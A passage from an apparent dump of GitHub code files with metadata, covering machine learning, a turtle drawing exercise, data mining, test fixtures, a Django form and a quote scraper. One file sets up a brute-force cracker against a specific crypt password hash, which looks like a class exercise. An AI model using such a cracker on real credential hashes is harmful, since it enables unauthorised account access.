aggregation_method=tf.AggregationMethod.EXPERIMENTAL_ACCUMULATE_N)\n grad = tf.stop_gradient(grad)\n perturb = _scale_l2(grad, epsilon)\n return embedded + perturb\n\n\ndef normalize(emb, weights):\n print(\"Weights: \", weights)\n mean = tf.reduce_sum(weights * emb, 0, keep_dims=True)\n var = tf.reduce_sum(weights * tf.pow(emb - mean, 2.), 0, keep_dims=True)\n stddev = tf.sqrt(1e-6 + var)\n return (emb - mean) / stddev\n\n\nclass TextAblstm(object):\n \"\"\"文本分类,ablstm模型\"\"\"\n def __init__(self, config):\n self.config = config\n self.vocab_freqs = tf.constant(self.config.voc_freq, dtype=tf.float32, shape=(self.config.vocab_size, 1))\n # 三个待输入的数据\n self.input_x = tf.placeholder(tf.int32, [None, self.config.seq_length])\n self.input_y = tf.placeholder(tf.float32, [None, self.config.num_classes])\n self.keep_prob = tf.placeholder(tf.float32)\n self.is_training = tf.placeholder(tf.bool)\n\n self.ablstm()\n\n def cal_loss_logit(self,batch_embedded, keep_prob, W, W_fc, b_fc, batch_y, reuse=True, scope=\"loss\"):\n with tf.variable_scope(scope, reuse=reuse) as scope:\n rnn_outputs, _ = bi_rnn(BasicLSTMCell(self.config.hidden_dim), BasicLSTMCell(self.config.hidden_dim),\n inputs=batch_embedded, dtype=tf.float32)\n # Attention\n ATTENTION_SIZE = 50\n attention_output, alphas = attention(rnn_outputs, ATTENTION_SIZE, return_alphas=True)\n drop = tf.nn.dropout(attention_output, keep_prob)\n # Fully connected layer\n y_hat = tf.nn.xw_plus_b(drop, W_fc, b_fc)\n y_hat = tf.squeeze(y_hat)\n return y_hat, tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=y_hat, labels=batch_y))\n\n\n\n\n def ablstm(self):\n \"\"\"模型\"\"\"\n\n with tf.name_scope(\"input_embedding\"):\n embeddings_var = tf.Variable(\n tf.random_uniform([self.config.vocab_size, self.config.embedding_dim], -1.0, 1.0))\n weights = self.vocab_freqs / tf.reduce_sum(self.vocab_freqs)\n embedding_norm = normalize(embeddings_var, weights)\n print(\"embedding_norm'shape\", embedding_norm)\n batch_embedded = tf.nn.embedding_lookup(embedding_norm, self.input_x)\n print(\"batch_embedded'shape\", batch_embedded)\n\n\n with tf.name_scope(\"loss\"):\n W = tf.Variable(tf.random_normal([self.config.hidden_dim], stddev=0.1))\n #attention *2\n W_fc = tf.Variable(tf.truncated_normal([self.config.hidden_dim*2, self.config.num_classes], stddev=0.1))\n\n b_fc = tf.Variable(tf.constant(0., shape=[self.config.num_classes]))\n\n logits, cl_loss = self.cal_loss_logit(batch_embedded, self.keep_prob,W, W_fc, b_fc, self.input_y, reuse=False)\n embedding_perturbated = add_perturbation(batch_embedded, cl_loss,self.config.epsilon)\n ad_logits, ad_loss = self.cal_loss_logit(embedding_perturbated, self.keep_prob,\n W,W_fc, b_fc, self.input_y,reuse=True)\n\n self.loss = cl_loss + ad_loss\n\n self.optim = tf.train.AdamOptimizer(learning_rate=self.config.learning_rate).minimize(self.loss)\n\n self.y_pred_cls = tf.argmax(tf.nn.softmax(logits), 1) # 预测类别\n self.predict_label = tf.nn.top_k(tf.nn.softmax(logits), k=self.config.topk, sorted=True, name=None)\n\n\n\n with tf.name_scope(\"accuracy\"):\n # 准确率\n correct_pred = tf.equal(tf.argmax(self.input_y, 1), self.y_pred_cls)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"githoo/rdc","sub_path":"abblstm/abblstm_model.py","file_name":"abblstm_model.py","file_ext":"py","file_size_in_byte":6906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19208134466","text":"#Daniel Stulberg Huf turma 33D matricula 1920468\r\n\r\nimport turtle\r\ndan=turtle.Turtle()\r\n\r\n#1\r\ndef desenhaRetangulo(tart,cor,dist1,dist2):\r\n tart.color(cor)\r\n tart.fd(dist1)\r\n tart.rt(90)\r\n tart.fd(dist2)\r\n tart.rt(90)\r\n tart.fd(dist1)\r\n tart.rt(90)\r\n tart.fd(dist2)\r\n tart.rt(90)\r\n return\r\n\r\ndef desloca(tart,dist):\r\n tart.up()\r\n tart.fd(dist)\r\n tart.down()\r\n return\r\n\r\ndan.shape('turtle')\r\ndan.width(2)\r\ndan.lt(180)\r\ndesenhaRetangulo(dan,'black',100,50)\r\ndan.rt(180)\r\ndesloca(dan,100)\r\ndan.lt(180)\r\ndesenhaRetangulo(dan,'brown',100,50)\r\ndesloca(dan,100)\r\ndan.lt(90)\r\ndesloca(dan,50)\r\ndan.rt(90)\r\ndesenhaRetangulo(dan,'yellow',100,50)\r\ndan.rt(180)\r\ndesloca(dan,100)\r\ndan.lt(180)\r\ndesenhaRetangulo(dan,'blue',100,50)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"danielhuf/puc-introducao-programacao","sub_path":"Teste_resolvido1.py","file_name":"Teste_resolvido1.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1449117618","text":"import math\nfrom itertools import combinations\nfrom itertools import permutations\n\ndef read_dataset(filename):\n\tlines = open(filename).readlines()\n\titems = lines[0].split(',')\n\tdata = []\n\tfor line in lines[1:]:\n\t\tdata.append(list(map(int, line.split(','))))\n\treturn { 'items': items, 'data': data }\n\ndef get_freq(data, items, s):\n\tfreq = 0\n\tfor d in data:\n\t\ttemp = 1\n\t\tfor i in s:\n\t\t\ttemp *= d[items.index(i)]\n\t\tif temp >= 1:\n\t\t\tfreq += 1\n\treturn freq\n\ndef get_itemsets(data, items, level):\n\tsets = set(combinations(items, level))\n\titem_sets = []\n\tfor s in sets:\n\t\tif(get_freq(data, items, s) >= min_freq):\n\t\t\titem_sets.append(s)\n\treturn item_sets\n\ndef print_rules(rules):\n\t#[start, end, confidence]\n\tfor rule in rules:\n\t\tprint(str(rule[0]) + \"\\t\\t-------->\\t\\t\" + str(rule[1]) + \"\\t\\t\" + str(rule[2]))\n\ndataset = read_dataset('market.csv')\nmin_freq_perc = 40\nmin_freq = math.ceil((min_freq_perc/100.0)*len(dataset['data']))\nmin_confidence_perc = 50 #confidence\n\nrules = []\nfor l in range(2, len(dataset['items']) + 1):\n\titemset = get_itemsets(dataset['data'], dataset['items'], l)\n\tif(len(itemset) == 0):\n\t\tbreak\n\t# print(\"Level: \" + str(l) + \": \\n\" + str(itemset) + \"\\n\\n\")\n\tfor s in itemset:\n\t\tfreq_s = get_freq(dataset['data'], dataset['items'], s)\n\t\tpermutations = list(permutations(s))\n\t\tfor _s in permutations:\n\t\t\tfor i in range(0, len(_s) - 1):\n\t\t\t\tx = _s[0:i+1]\n\t\t\t\ty = _s[i+1:]\n\t\t\t\tfreq_x = get_freq(dataset['data'], dataset['items'], x)\n\t\t\t\tc = float(freq_s)/float(freq_x)\n\t\t\t\tif c*100 >= min_confidence_perc:\n\t\t\t\t\trules.append([x, y, c])\n\nprint(\"\\nGenerated Rules: \\nGenerated\")\nprint_rules(rules)\n\n","repo_name":"virajvchavan/Data-Mining","sub_path":"association_rules/association_rules.py","file_name":"association_rules.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"33422075713","text":"#!/usr/bin/env python3\n\nimport sys\nfrom textwrap import dedent\n\n######################\n#### control bits ####\n######################\n\n# Do# - Data-bus output selector.\n# 0b00: none\n# 0b01: Program ROM\n# 0b10: Reserved\n# 0b11: Register-B\n# Dl# - Data-bus load selector.\n# 0b00: none\n# 0b01: Instruction pointer\n# 0b10: Register-A\n# 0b11: Register-B\n# Ao# - Address-bus output selector.\n# 0b0: none\n# 0b1: Instruction pointer\n# MCl - Instruction load (microinstruction register load)\n# Abs - Register-A bus select\n# L: Data-bus\n# H: Address-bus\n# ADc - ALU/ADD carry\n# ADo - ALU/ADD ouput\n# PCr - Program-counter reset\n# RAo - Register-A output\n# RFl - Flags-Register load\n# Flc - Load instruction pointer only if flags carry bit is set. (jump-if-carry)\n\nDo0, Do1, Do2, Do3 = 0b00, 0b01, 0b10, 0b11\nDl0, Dl1, Dl2, Dl3 = 0b00 << 2, 0b01 << 2, 0b10 << 2, 0b11 << 2\nAo0, Ao1 = 0b0 << 4, 0b1 << 4\nMCl = 0b1 << 5\nAbs = 0b1 << 6\nADc = 0b1 << 7\nADo = 0b1 << 8\nPCr = 0b1 << 9\nRAo = 0b1 << 10\nRFl = 0b1 << 11\nFlc = 0b1 << 12\n\nINC_IP = Do0|Dl1|Ao1|ADc|ADo # increment instruction pointer\nNEXT = Ao1|MCl # execute next instruction\n\nspec = [\n (\n 'reset => 0x{0:1x}',\n [Do0|Dl1, Do0|Dl2, Do0|Dl3, NEXT|PCr],\n ),\n (\n 'nop => 0x{0:1x}',\n [INC_IP, NEXT],\n ),\n (\n 'load a, {{value}} => 0x{0:1x} @ value`4',\n [INC_IP, Do1|Dl2|Ao1, INC_IP, NEXT],\n ),\n (\n 'load b, {{value}} => 0x{0:1x} @ value`4',\n [INC_IP, Do1|Dl3|Ao1, INC_IP, NEXT],\n ),\n (\n 'inc a => 0x{0:1x}',\n [RAo|Dl2|Abs|ADc|ADo|RFl, INC_IP, NEXT],\n ),\n (\n 'mov a, b => 0x{0:1x}',\n [RAo|Dl3, INC_IP, NEXT],\n ),\n (\n 'mov b, a => 0x{0:1x}',\n [Do3|Dl2, INC_IP, NEXT],\n ),\n (\n 'jmp {{value}} => 0x{0:1x} @ value`4',\n [INC_IP, Do1|Dl1|Ao1, NEXT],\n ),\n (\n 'jc {{value}} => 0x{0:1x} @ value`4',\n [INC_IP, Do1|Dl1|Ao1|Flc, NEXT|Flc, INC_IP, NEXT],\n ),\n]\n\nmicrocode = []\nruledef = []\n\nfor i, v in enumerate(spec):\n rule, uops = v\n microcode.append(\"{:d}: {:s}\".format(i*16, ' '.join([str(v) for v in uops])))\n ruledef.append(\"\\t\" + rule.format(i))\n\nprint(\"Microcode:\", file=sys.stderr)\nprint(\"\\n\".join(microcode))\n\nprint(file=sys.stderr)\n\nprint(\"Assembler definition:\", file=sys.stderr)\nprint(dedent(\"\"\"\n #bits 4\n #bankdef prg { #addr 0x0, #size 0x10, #outp 0x0 }\n #bank prg\n \"\"\").strip())\nprint(\"#ruledef\")\nprint(\"{\")\nprint(\"\\n\".join(ruledef))\nprint(\"}\")\n","repo_name":"Izzette/circuitjs-computer","sub_path":"microcode.py","file_name":"microcode.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72083956947","text":"from config_tempest import api_discovery as api\nfrom config_tempest import config_tempest as tool\nfrom fixtures import MonkeyPatch\nimport json\nimport mock\nfrom oslotest import base\n\n\nclass BaseConfigTempestTest(base.BaseTestCase):\n\n \"\"\"Test case base class for all config_tempest unit tests\"\"\"\n\n def _get_conf(self, V2, V3):\n \"\"\"Creates fake conf for testing purposes\"\"\"\n conf = tool.TempestConf()\n uri = \"http://172.16.52.151:5000/\"\n conf.set(\"identity\", \"username\", \"demo\")\n conf.set(\"identity\", \"password\", \"secret\")\n conf.set(\"identity\", \"tenant_name\", \"demo\")\n conf.set(\"identity\", \"disable_ssl_certificate_validation\", \"true\")\n conf.set(\"identity\", \"auth_version\", \"v3\")\n conf.set(\"identity\", \"uri\", uri + V2, priority=True)\n conf.set(\"identity\", \"uri_v3\", uri + V3)\n conf.set(\"identity\", \"admin_username\", \"admin\")\n conf.set(\"identity\", \"admin_tenant_name\", \"adminTenant\")\n conf.set(\"identity\", \"admin_password\", \"adminPass\")\n conf.set(\"auth\", \"use_dynamic_credentials\", \"False\")\n return conf\n\n def _get_alt_conf(self, V2, V3):\n \"\"\"Contains newer params in place of the deprecated params\"\"\"\n conf = tool.TempestConf()\n uri = \"http://172.16.52.151:5000/\"\n conf.set(\"identity\", \"username\", \"demo\")\n conf.set(\"identity\", \"password\", \"secret\")\n conf.set(\"identity\", \"tenant_name\", \"demo\")\n conf.set(\"identity\", \"disable_ssl_certificate_validation\", \"true\")\n conf.set(\"identity\", \"auth_version\", \"v3\")\n conf.set(\"identity\", \"uri\", uri + V2, priority=True)\n conf.set(\"identity\", \"uri_v3\", uri + V3)\n conf.set(\"auth\", \"admin_username\", \"admin\")\n conf.set(\"auth\", \"admin_project_name\", \"adminTenant\")\n conf.set(\"auth\", \"admin_password\", \"adminPass\")\n conf.set(\"auth\", \"use_dynamic_credentials\", \"True\")\n return conf\n\n @mock.patch('os_client_config.cloud_config.CloudConfig')\n def _get_clients(self, conf, mock_args, admin=False):\n \"\"\"Returns ClientManager instance\"\"\"\n mock_function = mock.Mock(return_value=False)\n func2mock = 'os_client_config.cloud_config.CloudConfig.config.get'\n self.useFixture(MonkeyPatch(func2mock, mock_function))\n return tool.ClientManager(conf, admin=admin)\n\n\nclass BaseServiceTest(base.BaseTestCase):\n\n \"\"\"Test case base class for all api_discovery unit tests\"\"\"\n\n FAKE_TOKEN = \"s6d5f45sdf4s564f4s6464sdfsd514\"\n FAKE_HEADERS = {\n 'Accept': 'application/json', 'X-Auth-Token': FAKE_TOKEN\n }\n FAKE_URL = \"http://10.200.16.10:8774/\"\n FAKE_VERSIONS = (\n {\n \"versions\": [{\n \"status\": \"SUPPORTED\",\n \"updated\": \"2011-01-21T11:33:21Z\",\n \"links\": [{\n \"href\": \"http://10.200.16.10:8774/v2 / \",\n \"rel\": \"self \"\n }],\n \"min_version\": \"\",\n \"version\": \"\",\n \"id\": \"v2.0\",\n \"values\": [\n {\"id\": 'v3.8'}\n ]\n }, {\n \"status\": \"CURRENT\",\n \"updated\": \"2013-07-23T11:33:21Z\",\n \"links\": [{\n \"href\": \"http://10.200.16.10:8774/v2.1/\",\n \"rel\": \"self\"\n }],\n \"min_version\": \"2.1\",\n \"version\": \"2.41\",\n \"id\": \"v2.1\",\n \"values\": [\n {\"id\": 'v2.0'}\n ]\n }]\n }\n )\n FAKE_IDENTITY_VERSIONS = (\n {\n 'versions': {\n 'values': [{\n 'status': 'stable',\n 'id': 'v3.8',\n }, {\n 'status': 'deprecated',\n 'id': 'v2.0',\n }]\n }\n }\n )\n FAKE_EXTENSIONS = (\n {\n \"extensions\": [{\n \"updated\": \"2014-12-03T00:00:00Z\",\n \"name\": \"Multinic\",\n \"namespace\": \"http://docs.openstack.org/compute/ext/fake_xml\",\n \"alias\": \"NMN\",\n \"description\": \"Multiple network support.\"\n }, {\n \"updated\": \"2014-12-03T00:00:00Z\",\n \"name\": \"DiskConfig\",\n \"namespace\": \"http://docs.openstack.org/compute/ext/fake_xml\",\n \"alias\": \"OS-DCF\",\n \"description\": \"Disk Management Extension.\"\n }]\n }\n )\n FAKE_IDENTITY_EXTENSIONS = (\n {\n \"extensions\": {\n 'values': [{\n 'alias': 'OS-DCF',\n 'id': 'v3.8',\n }, {\n 'alias': 'NMN',\n 'id': 'v2.0',\n }]\n }\n }\n )\n FAKE_STORAGE_EXTENSIONS = (\n {\n \"formpost\": {},\n \"methods\": [\"GET\", \"HEAD\", \"PUT\", \"POST\", \"DELETE\"],\n \"ratelimit\": {\n \"account_ratelimit\": 0.0,\n \"max_sleep_time_seconds\": 60.0,\n \"container_ratelimits\": []\n },\n \"account_quotas\": {},\n \"swift\": {\n \"container_listing_limit\": 10000,\n \"allow_account_management\": True,\n \"max_container_name_length\": 256\n }\n }\n )\n\n class FakeRequestResponse(object):\n URL = 'http://docs.openstack.org/api/openstack-identity/3/ext/'\n FAKE_V3_EXTENSIONS = (\n {\n 'resources': {\n URL + 'OS-INHERIT/1.0/rel/domain_user_'\n + 'role_inherited_to_projects': \"\",\n\n URL + 'OS-SIMPLE-CERT/1.0/rel/ca_certificate': \"\",\n\n URL + 'OS-EP-FILTER/1.0/rel/endpoint_group_to_'\n + 'project_association': \"\",\n\n URL + 'OS-EP-FILTER/1.0/rel/project_endpoint': \"\",\n\n URL + 'OS-OAUTH1/1.0/rel/user_access_token_roles': \"\"\n }\n }\n )\n\n def __init__(self):\n self.content = json.dumps(self.FAKE_V3_EXTENSIONS)\n\n def _fake_service_do_get_method(self, fake_data):\n function2mock = 'config_tempest.api_discovery.Service.do_get'\n do_get_output = json.dumps(fake_data)\n mocked_do_get = mock.Mock()\n mocked_do_get.return_value = do_get_output\n self.useFixture(MonkeyPatch(function2mock, mocked_do_get))\n\n def _test_get_service_class(self, service, cls):\n resp = api.get_service_class(service)\n self.assertEqual(resp, cls)\n\n def _get_extensions(self, service, expected_resp, fake_data):\n self._fake_service_do_get_method(fake_data)\n resp = service.get_extensions()\n self.assertItemsEqual(resp, expected_resp)\n\n def _test_deserialize_versions(self, service, expected_resp, fake_data):\n resp = service.deserialize_versions(fake_data)\n self.assertItemsEqual(resp, expected_resp)\n","repo_name":"mail2nsrajesh/python-tempestconf","sub_path":"config_tempest/tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41597741454","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 9 21:27:39 2023\n\n@author: Admin\n\"\"\"\n\ndef match_lists(master, to_filter):\n res=[]\n for m in master:\n res.extend([f for f in to_filter if f.startswith(m) and len(f)>len(m)])\n return res\n\nimport pandas as pd\n\n# Set the folder path to the .csv file created by the fiber_cone tool\nfpath=\"D:\\\\Data\\\\Folder\\\\\"\n# Set the suffix of the .csv filenames\nftype=\"_aligned_cones_x_th_x_ROIs.csv\"\n# Generate the list of file prefixes\nfprefix=[\"jy\"+str(i+1).zfill(2) for i in range(17)]\n\n\n# Define the list of brain areas to include into the results\nselect_grand_areas=[\"VISC1\",\"VISC2/3\",\"VISC4\",\"VISC5\",\"VISC6a\", \"SSs1\",\"SSs2/3\",\"SSs4\",\"SSs5\",\"SSs6a\", \"SSp\", \"AIp1\",\"AIp2/3\",\"AIp5\",\"AIp6a\",\"TEa\", \"AUDv\", \"ECT\", \"PERI\", \"ENT\", \"CLA\", \"EPd\", \"EPv\", \"PIR\"]\n\n\nfibers=[\"cone1\",\"cone2\"]\n\ndf_pools=[pd.DataFrame()]\n\nfor f in fibers:\n df_pools.append(pd.DataFrame())\n\n\nfor fp in fprefix:\n df=pd.read_csv(fpath+fp+ftype, index_col=0, encoding='cp1252')\n df[\"brain_area\"]=df[\"Label\"].apply(lambda row: row.split(\" x \")[2])\n df[\"cone\"]=df[\"Label\"].apply(lambda row: row.split(\" x \")[0].split(\"_\")[0])\n brain_areas=list(df[\"brain_area\"].unique())\n \n volumes=[]\n slices=[]\n \n df_cones=[df]\n for c in fibers:\n df_cones.append(df.where(df[\"cone\"]==c).dropna())\n \n res_df_alls=[]\n \n for l, dff in enumerate(df_cones):\n volumes.append([])\n slices.append([])\n for br in brain_areas:\n df_br=dff.where(dff[\"brain_area\"]==br).dropna()\n volumes[l].append(df_br[\"Area (µm^2)\"].sum())\n slices[l].append(\",\".join([str(int(s)) for s in df_br[\"Slice\"].to_list()]))\n d={\"Animal\":fp, \"Brain area\":brain_areas, \"Total area (µm^2)\":volumes[l], \"List of slices\":slices[l]}\n res_df_alls.append(pd.DataFrame(data=d))\n res_df_alls[l].sort_values(by=[\"Brain area\"], axis=0, ascending=True, inplace=True, ignore_index=True)\n \n \n #selected_areas=match_lists(select_grand_areas, brain_areas)\n \n for m, res_dfs in enumerate(res_df_alls):\n res_df_grands=res_dfs[res_dfs[\"Brain area\"].isin(select_grand_areas)].copy()\n for br in select_grand_areas:\n if br not in res_dfs[\"Brain area\"].tolist():\n d={\"Animal\":fp, \"Brain area\":br, \"Total area (µm^2)\":0.0, \"List of slices\":[]}\n res_df_grands=pd.concat([res_df_grands,pd.DataFrame([d])], ignore_index=True)\n tot_a=res_df_grands[\"Total area (µm^2)\"].sum()\n #df_grands=res_df_all[res_df_all[\"Brain area\"].isin(grand_areas)].copy()\n #total_grands=df_grands[\"Total area (µm^2)\"].sum()\n #d_grands={\"Animal\":fp, \"Brain area\":\"Others\", \"Total area (µm^2)\":total_grands-tot_a, \"List of slices\":\"\"}\n #res_df_grands=res_df_grands.append(d_grands, ignore_index = True)\n res_df_grands[\"Norm. area\"]=res_df_grands[\"Total area (µm^2)\"].apply(lambda row: row/tot_a*100)\n df_pools[m]=pd.concat([df_pools[m],res_df_grands], ignore_index = True)\n \npooled_brain_areas=[] \n \nfor k, dfs in enumerate(df_pools):\n dfs.reset_index()\n pooled_brain_areas.append(list(dfs[\"Brain area\"].unique()))\n pooled_brain_areas[k].sort()\n #pooled_brain_areas.remove(\"Others\")\n #pooled_brain_areas.append(\"Others\")\n\nprint(pooled_brain_areas[0],pooled_brain_areas[1],pooled_brain_areas[2])\n\nfnames=[\"BOTH\",\"CONE1\",\"CONE2\"]\n\nfor k, dfs in enumerate(df_pools):\n\n df_summary_abs=pd.DataFrame()\n df_summary_norm=pd.DataFrame()\n \n for fp in fprefix:\n d_abs_data={\"Animal\":fp}\n d_norm_data={\"Animal\":fp}\n df_per_mouse=dfs[dfs['Animal']==fp]\n for br in pooled_brain_areas[k]:\n abs_area=df_per_mouse[df_per_mouse['Brain area']==br][\"Total area (µm^2)\"]\n norm_area=df_per_mouse[df_per_mouse['Brain area']==br][\"Norm. area\"]\n if (abs_area.shape[0]>0):\n d_abs_data[br]=abs_area.item()\n d_norm_data[br]=norm_area.item()\n else:\n d_abs_data[br]=0\n d_norm_data[br]=0\n df_summary_abs=pd.concat([df_summary_abs, pd.DataFrame([d_abs_data])], axis=0, ignore_index = True)\n df_summary_norm=pd.concat([df_summary_norm, pd.DataFrame([d_norm_data])], axis=0, ignore_index = True)\n \n pooled_brain_areas[k].insert(0,\"Animal\")\n df_summary_abs=df_summary_abs[pooled_brain_areas[k]]\n df_summary_norm=df_summary_norm[pooled_brain_areas[k]]\n \n dfs.to_csv(fpath+fnames[k]+ftype)\n df_summary_abs.to_csv(fpath+fnames[k]+\"_SUMMARY_ABS\"+ftype)\n df_summary_norm.to_csv(fpath+fnames[k]+\"_SUMMARY_NORM\"+ftype)","repo_name":"bmi-lsym/Optogenetic_PostHoc_Validator","sub_path":"cones_vs_threshold_vs_atlas_processing.py","file_name":"cones_vs_threshold_vs_atlas_processing.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4603879604","text":"# -*-coding:utf-8 -*-\n'''\nCreated on 2013-11-2\n\n@author: Danny<manyunkai@hotmail.com>\nDannyWork Project\n'''\n\nfrom django import forms\nfrom django.conf import settings\n\nfrom dshare.models import Photo\nfrom common.image_utils import ModelImageParser, GenericImageParser\n\n\nclass PhotoForm(forms.ModelForm):\n def clean(self):\n if 'image' in self.changed_data:\n image = self.cleaned_data.get('image', None)\n if image:\n handler = GenericImageParser([image], settings.PHOTO_CONF)\n if not handler.is_valid():\n self._errors['image'] = self.error_class([handler.error])\n else:\n self._errors['image'] = self.error_class([u'上传的图片无效'])\n return self.cleaned_data\n\n def save(self, commit=True):\n result = super(PhotoForm, self).save(commit=commit)\n result.save()\n\n if 'image' in self.changed_data:\n handler = ModelImageParser(result.image.path, settings.PHOTO_CONF)\n handler.parse()\n handler.save()\n\n if handler.parsed.size[0] > 950:\n result.has_large_size = True\n else:\n result.has_large_size = False\n result.save()\n\n return result\n\n class Meta:\n model = Photo\n widgets = {\n 'description': forms.Textarea\n }\n","repo_name":"RyanLyu/dannysite.com","sub_path":"src/dshare/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"2408150969","text":"#from crypt import crypt\nfrom passlib.hash import sha256_crypt as sha256\nfrom loopCodeProcess import LoopCodeProcess\nimport time\n\nif __name__ == '__main__':\n\t################\n\t# PARAMETERS #\n\t################\n\n\t#Bases\n\tmajuscule = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\tmajLen = len(majuscule)\n\n\tminuscule = 'abcdefghijklmnopqrstuvwxyz'\n\tminLen = len(minuscule)\n\n\tsymbole = '!'\n\tsymLen = len(symbole)\n\n\tchiffre = '0123456789'\n\tchiLen = len(chiffre)\n\n\t################\n\t# MAIN PROGRAM #\n\t################\n\n\t#Encryption parameters\n\ttabBase = [majuscule, minuscule, minuscule, minuscule, symbole, chiffre, chiffre, chiffre]\n\tmySalt = 'KS'\n\tsearchWord='KSIdqhF5l6N2s'\n\n\t#Show estimation\n\tnbComb = 1\n\tfor base in tabBase:\n\t\tnbComb = nbComb * len(base)\n\tprint(\"Number of combinaison \", nbComb)\n\n\tmyLoop = LoopCodeProcess(0, 3, searchWord, mySalt, tabBase) \n\t#myLoop2 = LoopCode(4, 7, searchWord, mySalt, tabBase) \n\tmyLoop.start()\n\t#myLoop2.start()\n\n\t#Sleep for 10 secs\n\ttime.sleep(1)\n\tprint(str(myLoop.getLoopCount()))\n\ttime.sleep(1)\n\tmyLoop.stop()\n\tprint(str(myLoop.getLoopCount()))\n\tmyLoop.terminate()\n\tprint(str(myLoop.getLoopCount()))\n\tprint(myLoop.getCurrent())\n\n\t#ten_loop_code(searchWord, mySalt, tabBase)\n\n\n\n\n\n","repo_name":"chimeji/python_pj","sub_path":"alphabet/old/mainProcess.py","file_name":"mainProcess.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10483108782","text":"class ReminderTime:\n def __init__(self, allDay, year, month, day, hour = 0, minute = 0, endhour = 0, endminute = 0):\n self.allDay = allDay\n self.year = year\n self.month = month\n self.day = day\n self.hour = hour\n self.minute = minute\n self.endhour = endhour\n self.endminute = endminute\n self.starttime = str(hour) + \":\" + str(minute).zfill(2)\n self.endtime = str(endhour) + \":\" + str(endminute).zfill(2)\n\n def __str__(self):\n if self.allDay:\n return '{}/{}/{}'.format(self.year, str(self.month).zfill(2), str(self.day).zfill(2))\n if self.endhour == 0:\n return '{}/{}/{} {}'.format(self.year, str(self.month).zfill(2), str(self.day).zfill(2), self.starttime)\n return '{}/{}/{} {}-{}'.format(self.year, str(self.month).zfill(2), str(self.day).zfill(2), self.starttime, self.endtime)\n\n def __lt__(self, other):\n if self.year < other.year:\n return True\n if self.year > other.year:\n return False\n if self.month < other.month:\n return True\n if self.month > other.month:\n return False\n if self.day < other.day:\n return True\n if self.day > other.day:\n return False\n if self.allDay or other.allDay:\n return True\n if self.hour < other.hour:\n return True\n if self.hour > other.hour:\n return False\n if self.minute < other.minute:\n return True\n if self.minute > other.minute:\n return False\n\n def __gt__(self, other):\n if self.year > other.year:\n return True\n if self.year < other.year:\n return False\n if self.month > other.month:\n return True\n if self.month < ohter.month:\n return False\n if self.day > other.day:\n return True\n if self.day < other.day:\n return False\n if self.allDay or other.allDay:\n return True\n if self.hour > other.hour:\n return True\n if self.hour < other.hour:\n return False\n if self.minute > other.minute:\n return True\n if self.minute < other.minute:\n return False\n\n def __eq__(self, other):\n if self.year == other.year and self.month == other.month and self.day == other.day and self.hour == other.hour and self.minute == other.minute:\n return True\n return False\n\n def overlapsWith(self, timeOther): # returns True if two reminders overlap, False if they don't\n if self.day == timeOther.day and self.month == timeOther.month and self.year == timeOther.year: # change this to use > < if time\n if self.allDay:\n return(true)\n if (self.hour <= timeOther.endhour and self.hour >= timeOther.hour):\n if self.hour == timeOther.endhour:\n if self.minute < timeOther.minute:\n return True\n if self.hour == timeOther.hour:\n if self.minute>timeOther.endminute:\n return True\n return True\n if (self.endhour < timeOther.endhour and self.endhour > timeOther.hour):\n if self.endhour == timeOther.endhour:\n if self.endminute < timeOther.minute:\n return True\n if self.endhour == timeOther.hour:\n if self.endminute > timeOther.endminute:\n return True\n return True\n return False\n","repo_name":"joying-yang/Web-Surfing-Without-Wifi","sub_path":"app/reminderTime.py","file_name":"reminderTime.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41071897567","text":"import json\nfrom scraper import Scraper\nimport os\nfrom typing import Union, Any, List\nfrom config import Config\n\n\nclass Data():\n\n @classmethod\n def store(cls, userInput: str) -> str:\n \"\"\"Store scraped data into json file\"\"\"\n scan: List[Any] = Scraper.quotes_by_author(userInput, 10) # type: ignore\n\n if os.stat(Config.PATH).st_size == 0:\n if len(scan) == 0 or scan[0] is None:\n return f\"\\nSorry, we couldn't find anything for '{userInput}'\\n\"\n else:\n with open(Config.PATH, \"w\") as data:\n json_quotes = json.dumps(scan)\n data.write(json_quotes)\n return \"\\nLibrary updated!\\n\"\n else:\n json_decoder: Union[List[dict], str] = Data.load(Config.PATH)\n if len(scan) > 0:\n for quote in scan:\n json_decoder.append(quote) # type: ignore\n Data.save(Config.PATH, json_decoder) # type: ignore\n return \"\\nLibrary updated!\\n\"\n else:\n return \"\\nSorry, we did not recognise this author/title\\n\"\n\n @classmethod\n def save(cls, path: str, data: str) -> Union[bool, str]:\n \"\"\"Save into JSON datatype\"\"\"\n try:\n with open(path, \"w\") as file_handler:\n json_string = json.dumps(data)\n file_handler.write(json_string)\n return True\n except (KeyboardInterrupt, SystemExit):\n return \"\\nSorry, there is nothing to open.\\n\"\n\n @classmethod\n def load(cls, path: str) -> Union[list, str]:\n \"\"\"Convert JSON datatype and return as Python datatype\"\"\"\n try:\n with open(path, \"r\") as data:\n raw_json = data.readline()\n quotes = json.loads(raw_json)\n return quotes\n except (KeyboardInterrupt, SystemExit):\n return 